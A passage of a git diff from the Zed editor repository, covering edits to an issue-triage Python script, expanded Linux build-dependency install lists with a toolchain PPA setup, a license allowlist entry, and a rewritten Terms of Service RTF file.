status=status, notes=notes, + 
bot_comment_time=bot_comment["created_at"]) def classify_as_missed_opportunity(issue): """Issue closed as duplicate but the bot never commented.""" print(" -> Missed opportunity") add_or_update_project_item( - issue["node_id"], outcome="Missed opportunity", closed_as="duplicate", status="Auto-classified") + issue["node_id"], outcome="Missed opportunity", closed_as="duplicate", status="Auto-classified", + bot_comment_time=issue["created_at"]) def classify_open(): @@ -425,16 +451,18 @@ def classify_open(): f"type is {type_name}" if type_name not in ("Bug", "Crash") else f"author {author} is staff" if is_staff_member(author) else "already on the board" if find_project_item(node_id) - else "no bot duplicate comment found" if not get_bot_duplicate_comment(number) + else "no bot duplicate comment found" if not (bot_comment := get_bot_comment_with_time(number)) else None ) + if skip_reason: print(f" #{number}: skipping, {skip_reason}") skipped += 1 continue print(f" #{number}: adding as Noise") - add_or_update_project_item(node_id, outcome="Noise", status="Auto-classified") + add_or_update_project_item(node_id, outcome="Noise", status="Auto-classified", + bot_comment_time=bot_comment["created_at"]) added += 1 except Exception as error: # broad catch: one issue failing shouldn't stop the sweep print(f" #{number}: error processing issue, skipping: {error}") diff --git a/script/language-extension-version b/script/language-extension-version deleted file mode 100755 index 119021e566d44a55428fe78ecf123e491d0a1616..0000000000000000000000000000000000000000 --- a/script/language-extension-version +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env bash - -set -euox pipefail - -if [ "$#" -lt 1 ]; then - echo "Usage: $0 [version]" - exit 1 -fi - -LANGUAGE=$1 -VERSION=${2:-} - -EXTENSION_DIR="extensions/$LANGUAGE" -EXTENSION_TOML="$EXTENSION_DIR/extension.toml" -CARGO_TOML="$EXTENSION_DIR/Cargo.toml" - -if [ ! -d "$EXTENSION_DIR" ]; then - echo "Directory $EXTENSION_DIR does not exist." 
- exit 1 -fi - -if [ -z "$VERSION" ]; then - grep -m 1 'version =' "$EXTENSION_TOML" | awk -F\" '{print $2}' - exit 0 -fi - -sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$EXTENSION_TOML" -sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$CARGO_TOML" -cargo update --workspace diff --git a/script/licenses/zed-licenses.toml b/script/licenses/zed-licenses.toml index 572dd5c14aebcdea3544ac15b751be4c212ecf52..db14a280f2f1537c37f96f6fa180b96d54afa209 100644 --- a/script/licenses/zed-licenses.toml +++ b/script/licenses/zed-licenses.toml @@ -26,6 +26,7 @@ accepted = [ "OpenSSL", "Zlib", "BSL-1.0", + "bzip2-1.0.6", ] [procinfo.clarify] diff --git a/script/linux b/script/linux index c5c4ea9ab3856545bcff63bc6bdaed5f06b8e07c..1eda7909b9580e95882f9de5ec9881f83acbcb13 100755 --- a/script/linux +++ b/script/linux @@ -27,16 +27,20 @@ if [[ -n $apt ]]; then g++ libasound2-dev libfontconfig-dev + libgit2-dev + libglib2.0-dev + libssl-dev + libva-dev + libvulkan1 libwayland-dev libx11-xcb-dev libxkbcommon-x11-dev - libssl-dev libzstd-dev - libvulkan1 - libgit2-dev make cmake clang + lld + llvm jq git curl @@ -46,6 +50,8 @@ if [[ -n $apt ]]; then musl-tools musl-dev build-essential + pipewire + xdg-desktop-portal ) if (grep -qP 'PRETTY_NAME="(Debian|Raspbian).+13' /etc/os-release); then # libstdc++-14-dev is in build-essential @@ -55,11 +61,30 @@ if [[ -n $apt ]]; then elif (grep -qP 'PRETTY_NAME="((Debian|Raspbian).+12|Linux Mint 21|.+22\.04)' /etc/os-release); then deps+=( mold libstdc++-12-dev ) elif (grep -qP 'PRETTY_NAME="((Debian|Raspbian).+11|Linux Mint 20|.+20\.04)' /etc/os-release); then - deps+=( libstdc++-10-dev ) + # Ubuntu 20.04 ships clang-10 and libstdc++-10 which lack adequate C++20 + # support for building webrtc-sys (requires -std=c++20, lambdas in + # unevaluated contexts from clang 17+, and working std::ranges in the + # stdlib). 
+ # Note: the prebuilt libwebrtc.a is compiled with libstdc++, so we must + # use libstdc++ (not libc++) to avoid ABI mismatches at link time. + + # libstdc++-11-dev (headers with working pointer_traits/contiguous_range) + # is only available from the ubuntu-toolchain-r PPA. Add the source list + # and GPG key manually instead of using add-apt-repository, whose HKP + # keyserver lookups (port 11371) frequently time out in CI. + $maysudo "$apt" install -y curl gnupg + codename=$(lsb_release -cs) + echo "deb https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu $codename main" | \ + $maysudo tee /etc/apt/sources.list.d/ubuntu-toolchain-r-test.list > /dev/null + curl -fsSL 'https://keyserver.ubuntu.com/pks/lookup?op=get&search=0x1E9377A2BA9EF27F' | \ + sed -n '/-----BEGIN PGP PUBLIC KEY BLOCK-----/,/-----END PGP PUBLIC KEY BLOCK-----/p' | \ + $maysudo gpg --dearmor -o /etc/apt/trusted.gpg.d/ubuntu-toolchain-r-test.gpg + deps+=( clang-18 libstdc++-11-dev ) fi $maysudo "$apt" update $maysudo "$apt" install -y "${deps[@]}" + finalize exit 0 fi @@ -78,6 +103,8 @@ if [[ -n $dnf ]] || [[ -n $yum ]]; then cmake alsa-lib-devel fontconfig-devel + glib2-devel + libva-devel wayland-devel libxcb-devel libxkbcommon-x11-devel @@ -85,6 +112,8 @@ if [[ -n $dnf ]] || [[ -n $yum ]]; then libzstd-devel vulkan-loader sqlite-devel + pipewire + xdg-desktop-portal jq git tar @@ -141,7 +170,9 @@ if [[ -n $zyp ]]; then cmake fontconfig-devel gcc + libva-devel gcc-c++ + glib2-devel git gzip jq @@ -158,6 +189,8 @@ if [[ -n $zyp ]]; then tar wayland-devel xcb-util-devel + pipewire + xdg-desktop-portal ) $maysudo "$zyp" install -y "${deps[@]}" finalize @@ -175,6 +208,8 @@ if [[ -n $pacman ]]; then cmake alsa-lib fontconfig + glib2 + libva wayland libgit2 libxcb @@ -184,6 +219,8 @@ if [[ -n $pacman ]]; then pkgconf mold sqlite + pipewire + xdg-desktop-portal jq git ) @@ -205,6 +242,8 @@ if [[ -n $xbps ]]; then gcc alsa-lib-devel fontconfig-devel + glib-devel + libva-devel libxcb-devel 
libxkbcommon-devel libzstd-devel @@ -213,6 +252,8 @@ if [[ -n $xbps ]]; then vulkan-loader mold sqlite-devel + pipewire + xdg-desktop-portal ) $maysudo "$xbps" -Syu "${deps[@]}" finalize @@ -226,16 +267,20 @@ if [[ -n $emerge ]]; then deps=( app-arch/zstd app-misc/jq + dev-libs/glib dev-libs/openssl dev-libs/wayland dev-util/cmake media-libs/alsa-lib media-libs/fontconfig + media-libs/libva media-libs/vulkan-loader x11-libs/libxcb x11-libs/libxkbcommon sys-devel/mold dev-db/sqlite + media-video/pipewire + sys-apps/xdg-desktop-portal ) $maysudo "$emerge" -u "${deps[@]}" finalize diff --git a/script/terms/terms.rtf b/script/terms/terms.rtf index f5fab23f4551fd0b3f8605209c3315eb470af224..cd01004c11ed10e58d3c17b1274cd499a1046c66 100644 --- a/script/terms/terms.rtf +++ b/script/terms/terms.rtf @@ -2,128 +2,194 @@ {\colortbl;\red255\green0\blue0;\red0\green0\blue255;} \widowctrl\hyphauto -{\pard \qc \f0 \sa180 \li0 \fi0 \b \fs36 Zed End User Terms\par} +{\pard \qc \f0 \sa180 \li0 \fi0 \b \fs36 Terms of Service\par} {\pard \ql \f0 \sa180 \li0 \fi0 \par} -{\pard \ql \f0 \sa180 \li0 \fi0 PLEASE READ THESE TERMS AND CONDITIONS CAREFULLY BEFORE USING THE SERVICE OR SOFTWARE OFFERED BY ZED INDUSTRIES, INC. ("ZED", OR "WE"). BY ACCESSING OR USING THE SOLUTION (AS DEFINED BELOW) IN ANY MANNER, YOU ("YOU" OR "CUSTOMER") AGREE TO BE BOUND BY THESE TERMS (THE "AGREEMENT") TO THE EXCLUSION OF ALL OTHER TERMS. YOU REPRESENT AND WARRANT THAT YOU HAVE THE AUTHORITY TO ENTER INTO THIS AGREEMENT; IF YOU ARE ENTERING INTO THIS AGREEMENT ON BEHALF OF AN ORGANIZATION OR ENTITY, REFERENCES TO "CUSTOMER" AND "YOU" IN THIS AGREEMENT, REFER TO THAT ORGANIZATION OR ENTITY. IF YOU DO NOT AGREE TO ALL OF THE FOLLOWING, YOU MAY NOT USE OR ACCESS THE SOLUTION IN ANY MANNER. IF THE TERMS OF THIS AGREEMENT ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO SUCH TERMS.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 1. 
ACCESS TO AND USE OF THE SOLUTION\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 2. TERMS APPLICABLE TO THE EDITOR\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.1. License Grant\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.2. License Limitations\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You agree that You shall not: (a) exceed the scope of the licenses granted in Section 2.1; (b) make copies of the Editor; (c) distribute, sublicense, assign, delegate, rent, lease, sell, time-share or otherwise transfer the benefits of, use under, or rights to, the license granted in Section 2.1; (d) reverse engineer, decompile, disassemble or otherwise attempt to learn the source code, structure or algorithms underlying the Editor, except to the extent required to be permitted under applicable law; (e) modify, translate or create derivative works of the Editor; or (f) remove any copyright, trademark, patent or other proprietary notice that appears on the Editor or copies thereof.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.3. 
Open Source Software\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed makes certain versions of the Editor and related software available at the Zed GitHub Repository: {\field{\*\fldinst{HYPERLINK "https://github.com/zed-industries/zed"}}{\fldrslt{\ul -https://github.com/zed-industries/zed -}}} - (the "Repo"). Your use of such software is subject to the open source software licenses declared in the Repo.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 3. TERMS APPLICABLE TO THE ZED SERVICE\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.1. Access to and Scope of Zed Service\par} -{\pard \ql \f0 \sa180 \li0 \fi0 If you have elected to use the Zed Service by enabling or activating the Zed Service, Zed will use commercially reasonable efforts to make the Zed Service available to You as set forth in this Agreement. Once you elected to use the Zed Service, You may access and use the Zed Service during the Term, subject to Your compliance with the terms and conditions of the Agreement.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.2. Restrictions\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You will use the Zed Service only in accordance with all applicable laws, including, but not limited to, laws related to data (whether applicable within the United States, the European Union, or otherwise). You agree not to (and will not allow any third party to): (i) remove or otherwise alter any proprietary notices or labels from the Zed Service or any portion thereof; (ii) reverse engineer, decompile, disassemble, or otherwise attempt to discover the underlying structure, ideas, or algorithms of the Zed Service or any software used to provide or make the Zed Service available; or (iii) rent, resell or otherwise allow any third party access to or use of the Zed Service. 
Zed may suspend Your access to or use of the Zed Service as follows: (a) immediately if Zed reasonably believes Your use of the Zed Service may pose a security risk to or may adversely impact the Zed Service; or (b) if You are in breach of this Agreement.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.3. Customer Data\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You are solely responsible for Customer Data including, but not limited to: (a) compliance with all applicable laws and this Agreement; (b) any claims relating to Customer Data; and (c) any claims that Customer Data infringes, misappropriates, or otherwise violates the rights of any third party. You agree and acknowledge that Customer Data may be irretrievably deleted if Your account is terminated. For purposes of this Agreement, "Customer Data" shall mean any data, information or other material provided, uploaded, or submitted by You to the Zed Service in the course of using the Zed Service. Notwithstanding anything to the contrary, You represent and warrant that You will not transfer or make available to Zed any personally identifiable information or related information subject to applicable data privacy laws or regulations, unless otherwise agreed to in writing by Zed.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.1. Customer Data Made Available to Zed\par} -{\pard \ql \f0 \sa180 \li0 \fi0 To the extent You elect to make Customer Data available to Zed, the same may only be used by Zed according to the Customer Data type and the use rights regarding the same as described herein:\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.2. 
Usage Data\par} -{\pard \ql \f0 \sa180 \li0 \fi0 To improve the Editor and understand how You use it, Zed optionally collects the following usage data:\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (a)\tx360\tab file extensions of opened files;\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (b)\tx360\tab features and tools You use within the Editor;\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (c)\tx360\tab project statistics (e.g., number of files); and\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (d)\tx360\tab frameworks detected in Your projects\sa180\sa180\par} -{\pard \ql \f0 \sa180 \li0 \fi0 (a-d collectively, "Usage Data"). Usage Data does not include any of Your software code or sensitive project details. You may change Your preferences disabling the collection of Usage Data and You can audit Usage Data collected by the Editor at any time. See {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/telemetry"}}{\fldrslt{\ul -https://zed.dev/docs/telemetry -}}} - for more.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Usage Data is associated with a secure random telemetry ID which may be linked to Your email address. This linkage currently serves two purposes: (1) it allows Zed to analyze usage patterns over time while maintaining Your privacy; and (2) it enables Zed to reach out to specific user groups for feedback and improvement suggestions. Zed may contact You based on Your usage patterns to better understand your needs and improve the Solution. If You delete Your account, the link between Your telemetry ID and Your email address will be permanently removed. By continuing to use Editor or Solution with this feature enabled You agree to this Usage Data collection.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.3. 
Crash Reports\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Customer Data consisting of data related to the behavior of the Solution prior to a crash or failure, such as stack traces are collected and classified as "Crash Reports". Zed will use commercially reasonable efforts to exclude any personally identifiable information from Crash Reports, but due to the nature of a crash, Zed does not ensure that information such as paths will be excluded from Crash Reports. Crash Reports will be used solely for Zed's internal purposes in connection with diagnosing defects in the Solution that led to the crash. You may grant us permission to capture Crash Reports when installing or activating the Solution, and You may change Your preferences at any time in the settings feature of the Solution. Once You grant us this permission, Zed will retain the Crash Reports indefinitely.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.4. User Content\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \u8226 ? You may access, modify or create certain data or information in connection with your access or use of the Zed Editor or the Solution. 
Such data and information may include, but is not limited to any of the following:\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (a)\tx360\tab file contents and associated metadata (e.g., filename, paths, size, timestamps);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (b)\tx360\tab source control history, comments and metadata (e.g., git history, commit messages);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (c)\tx360\tab configuration data (e.g., settings, keymaps);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (d)\tx360\tab anything typed, pasted and/or displayed on screen while using the Editor;\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (e)\tx360\tab derivative works of the above generated by the Editor (e.g., format conversions, summaries, indexes, caches);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (f)\tx360\tab metadata, code and other derivative works of the above returned by language servers and other local tooling; and\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (g)\tx360\tab metadata, code and other derivative works of the above returned by services integrated with the Zed Editor\sa180\sa180\par} -{\pard \ql \f0 \sa180 \li0 \fi0 (a-g collectively, "User Content").\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5. Handling of User Content\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed will make use of or transfer User Content only as specified in this Agreement, or as necessary to comply with applicable law.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.1. Zed Collaboration Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 When using Zed Collaboration Services, User Content is transmitted from Your environment only if You collaborate with other Zed users by electing to share a project in the Editor. 
Once You share a project, Zed may transmit User Content consisting of file paths, file contents, and metadata regarding the code returned by language servers. Currently, Zed does not persist any User Content beyond the Your collaboration session. If You unshare a project or disconnect from the Solution, all information associated with such project will be deleted from Zed servers. In the future, Zed may save User Content regarding projects beyond the scope of a single collaboration session. We may share such User Content with those users You elected to grant access to. Zed's access to such User Content is limited to debugging and making improvements to the Solution.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.2. Other Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The Zed Editor supports integration with API-based services maintained and not operated by Zed (the "Other Services"). By way of example, Other Services includes those made available by GitHub, Anthropic, OpenAI, and similar providers, or those You host or manage directly. You may configure the Zed Editor to interoperate, communicate with, and exchange data (including User Content) directly with the Other Services. Zed is not responsible or otherwise liable with respect to Your use of any Other Service, including but not limited to the exchange of data between the Other Service and the Zed Editor. The terms and conditions, including the applicable privacy policy, with respect to the Other Service are those made available by the applicable Other Service, not these Terms.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.3. Zed AI Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The Zed Editor supports integration with API-based services maintained and operated by Zed (the "Zed AI Services"). You may elect to use Zed AI Services as the provider for various Zed Editor features (e.g., Agent Panel, Inline Assistant, Edit Predictions, and similar features). 
In connection with Your use of these features, the Zed Editor and Zed AI Services may make use of User Content to generate contextually relevant responses (the \u8220"Output\u8221"). Other than as specified in Section 3.3.5.4 of these Terms, Zed will not use User Content for training of its models, or disclose User Content.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Output is provided "as is" without any warranties or guarantees of functionality, security, or fitness for a particular purpose. While efforts are made to ensure the accuracy and reliability, Output may include errors, vulnerabilities, and defects. You are responsible for reviewing, testing, and validating Output before use in any production or critical environment. Zed assumes no liability for any damages, losses, or liability arising from the use, modification, reliance on, or deployment of Output. Any such use is at Your own risk.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.4. Improvement Feedback\par} -{\pard \ql \f0 \sa180 \li0 \fi0 When using Zed AI Services to provide Edit Predictions in connection with certain open source software projects, You may elect to share requests, responses and feedback comments (collectively "Model Improvement Feedback") with Zed, and Zed may use the same to improve Zed Edit Predictions models. You may opt-out of sharing Model Improvement Feedback at any time.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 For more information on Zed Edit Predictions please see: {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/ai/ai-improvement"}}{\fldrslt{\ul -https://zed.dev/docs/ai/ai-improvement -}}} -\par} -{\pard \ql \f0 \sa180 \li0 \fi0 When using Zed AI Services in connection with the Agent Panel, You may elect to share with Zed requests, responses and feedback regarding the Agent Panel and related Output (the \u8220"Agent Improvement Feedback\u8221") with Zed, and Zed may use the same to improve the Agent Panel and related Output. 
Zed will only collect Agent Improvement Feedback when You elect to share the same.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 For more information regarding the Agent Panel please see: {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/ai/ai-improvement"}}{\fldrslt{\ul -https://zed.dev/docs/ai/ai-improvement -}}} -\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.4. Privacy Policy\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You and Zed are bound by the terms and conditions contained in the Zed Privacy Policy which is incorporated by reference hereto. The Zed Privacy Policy is available at the following URL: {\field{\*\fldinst{HYPERLINK "https://zed.dev/privacy-policy"}}{\fldrslt{\ul -https://zed.dev/privacy-policy +{\pard \ql \f0 \sa180 \li0 \fi0 {\b Last Updated}: March 2, 2026\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Welcome, and thank you for your interest in Zed Industries, Inc. (\u8220"{\b Zed},\u8221" \u8220"{\b we},\u8221" or \u8220"{\b us}\u8221") and our website at {\field{\*\fldinst{HYPERLINK "https://www.zed.dev"}}{\fldrslt{\ul +www.zed.dev +}}} +, along with our downloadable Zed software (the \u8220"{\b Software}\u8221") and related subscription service (the \u8220"{\b Service}\u8221"). 
These Terms of Service are a legally binding contract between you and Zed regarding your use of the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Please read the following Terms carefully.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b By accessing or using the Service, you (\u8220"You\u8221" or \u8220"Customer\u8221")\u160 ?agree to these Terms of Service, the Data Processing Addendum (\u8220"DPA\u8221"), available upon request,\u160 ?and Zed\u8217's {\field{\*\fldinst{HYPERLINK "/privacy-policy"}}{\fldrslt{\ul
+Privacy Policy
+}}}
+ (collectively, the \u8220"Terms\u8221").}\par}
+{\pard \ql \f0 \sa180 \li0 \fi0 If you are not eligible, or do not agree to the Terms, you may not access or use the Service.\par}
+{\pard \ql \f0 \sa180 \li0 \fi0 By using the Service, you confirm that you have read and understand these Terms and that they form a binding agreement between you and Zed.\par}
+{\pard \ql \f0 \sa180 \li0 \fi0 {\b ARBITRATION\u160 ?NOTICE}. Except for certain kinds of disputes described in Section\u160 ?15.2 (Dispute Resolution and Arbitration), you agree that disputes arising under these Terms will be resolved by binding, individual arbitration, and BY ACCEPTING THESE TERMS, YOU AND ZED ARE EACH WAIVING THE RIGHT TO A TRIAL BY JURY OR TO PARTICIPATE IN ANY CLASS ACTION OR REPRESENTATIVE PROCEEDING.\u160 ?ALTERNATIVELY, CUSTOMER MAY OPT OUT OF ARBITRATION PER SECTION 15.2(a).\par}
+{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 1. Overview\par}
+{\pard \ql \f0 \sa180 \li0 \fi0 Subject to these Terms, Zed will permit Customer to access and use Zed\u8217's AI-enabled software-as-a-service offering (the \u8220"{\b Service}\u8221"), which enables certain additional features and functionality (including artificial intelligence and collaboration features) in Zed\u8217's open source code editing software (\u8220"{\b Software}\u8221").\par}
+{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 2. 
Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.1. Eligibility\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u160 ?must be at least 18 years old\u160 ?to use the Service. By agreeing to these Terms, Customer represents and warrants to Zed that: (a) Customer is at least 18 years old; (b) Customer has not previously been suspended or removed from the Service; and (c) Customer\u8217's registration and use of the Service is in compliance with any and all applicable laws and regulations. If Customer is an entity, organization, or company, the individual accepting these Terms on Customer\u8217's behalf represents and warrants that they have authority to bind Customer to these Terms and Customer agrees to be bound by these Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.2. Access Grant\par} +{\pard \ql \f0 \sa180 \li0 \fi0 During the Term, subject to Customer\u8217's compliance with the terms of the Terms, Customer may access and use the Service only for Customer\u8217's internal business purposes\u160 ?or for individuals, for personal non-commercial purposes, in accordance with the then-current version of Zed\u8217's usage guidelines and standard technical documentation for the Service that Zed makes generally available to its customers (\u8220"{\b Documentation}\u8221"), the Terms, and any terms set forth in the applicable Subscription Service (as defined in Section 3.4 below). Customer\u160 ?agrees\u160 ?to access the Service only through the mechanisms designated by Zed. Without limiting the foregoing, to access the Service, Customer may be required to associate an existing third-party account with the Service to enable authentication (e.g., via OAuth). Customer will be responsible for the acts and omissions of all persons who access the Service through Customer\u8217's account as though such acts and omissions were Customer\u8217's own. 
Customer\u160 ?will promptly notify Zed if it becomes aware of any compromise to its Zed account.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.3. Acceptable Use\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service uses technology provided by multiple third party AI subprocessors (the \u8220"AI Providers\u8221") including but not limited to: Anthropic, PBC (\u8220"Anthropic\u8221"), Google LLC (\u8220"Google\u8221"), LiveKit Incorporated, OpenAI, LLC (\u8220"OpenAI\u8221") etc., as may be updated from time to time. Customer may not use the Service in a manner that violates any applicable AI Provider policy which are listed on {\field{\*\fldinst{HYPERLINK "https://zed.dev/acceptable-use-policies"}}{\fldrslt{\ul +https://zed.dev/acceptable-use-policies +}}} +, including Anthropic\u8217's {\field{\*\fldinst{HYPERLINK "https://www.anthropic.com/legal/aup"}}{\fldrslt{\ul +Usage Policy +}}} +, Google Gemini\u8217's {\field{\*\fldinst{HYPERLINK "https://policies.google.com/terms/generative-ai/use-policy"}}{\fldrslt{\ul +Generative AI Prohibited Use Policy +}}} +, GitHub's {\field{\*\fldinst{HYPERLINK "https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies"}}{\fldrslt{\ul +Acceptable Use Policy +}}} +, LiveKit\u8217's {\field{\*\fldinst{HYPERLINK "https://livekit.io/legal/acceptable-use-policy"}}{\fldrslt{\ul +Acceptable Use Policy +}}} +; OpenAI\u8217's {\field{\*\fldinst{HYPERLINK "https://openai.com/policies/usage-policies/"}}{\fldrslt{\ul +Usage Policies +}}} +\u160 ?or {\field{\*\fldinst{HYPERLINK "https://openai.com/api/policies/sharing-publication/"}}{\fldrslt{\ul +Sharing and Publication Policy +}}} +; and {\field{\*\fldinst{HYPERLINK "https://openai.com/api/policies/community-guidelines/"}}{\fldrslt{\ul +Community Guidelines +}}} +; each of which may be updated from time to time and are expressly incorporated by reference. 
Customer\u160 ?is solely responsible to check for updates to the applicable AI Provider policy from time to time.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.4. Restrictions\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer will not (and will not permit anyone else to), directly or indirectly, do any of the following: (a) provide access to, distribute, sell, or sublicense the Service to a third party; (b)\u160 ?seek to access non-public APIs associated with the Service; (c) copy any element of the Service; (d) interfere with the operation of the Service, circumvent any access restrictions, or conduct any security or vulnerability test of the Service; (e) transmit any viruses or other harmful materials to the Service or others;\u160 ?(f) take any action that risks harm to others or to the security, availability, or integrity of the Service except for the purposes of legitimate security or malware research; or (g) access or use the Service or Output in a manner that violates any applicable relevant local, state, federal or international laws, regulations, or conventions, including those related to data privacy or data transfer, international communications, or export of data (collectively, \u8220"{\b Laws}\u8221"), or the Terms.\u160 ?The Service incorporates functionality provided by third-party services, the use of which is subject to additional terms. Customer agrees that if Customer accesses or uses services, features or functionality in the Software or Service that are provided by a third party, Customer will comply with any applicable terms promulgated by that third party, including as set forth at {\field{\*\fldinst{HYPERLINK "/acceptable-use-policies"}}{\fldrslt{\ul +https://zed.dev/acceptable-use-policies +}}} +\u160 ?(as may be updated from time to time). 
Customer further acknowledges that certain components of the Software or Service may be covered by open source licenses ("{\b Open Source Component}"), including but not limited to Apache License, Version 2.0, GNU General Public License v3.0, and the GNU Affero General Public License v3.0.\u160 ?To the extent required by such open source license for the applicable Open Source Component, the terms of such license will apply to such Open Source Component in lieu of the relevant provisions of these Terms. If such open\u160 ?source license prohibits any of the restrictions in these Terms, such restrictions will not apply to such Open Source Component. Zed shall provide Customer with a list of Open Source Components upon Customer's request.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 3. General Payment Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Accessing certain features and tiers of the Service requires Customer\u160 ?to pay fees. Before Customer pays any fees, Customer will have an opportunity to review and accept the fees that Customer will be charged. Unless otherwise specifically provided for in these Terms, all fees are in U.S. Dollars and are non-refundable, except as required by law.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.1. Price\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed reserves the right to determine pricing for the Service. Zed will make reasonable efforts to keep pricing information published on our pricing page at {\field{\*\fldinst{HYPERLINK "https://zed.dev/pricing"}}{\fldrslt{\ul +https://zed.dev/pricing +}}} +\u160 ?up to date. Zed encourages Customer\u160 ?to check Zed\u8217's pricing page periodically for current pricing information. Zed may change the fees for any feature of the Service, including by adding fees or charges, if Zed gives Customer advance notice of changes before they apply.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.2. 
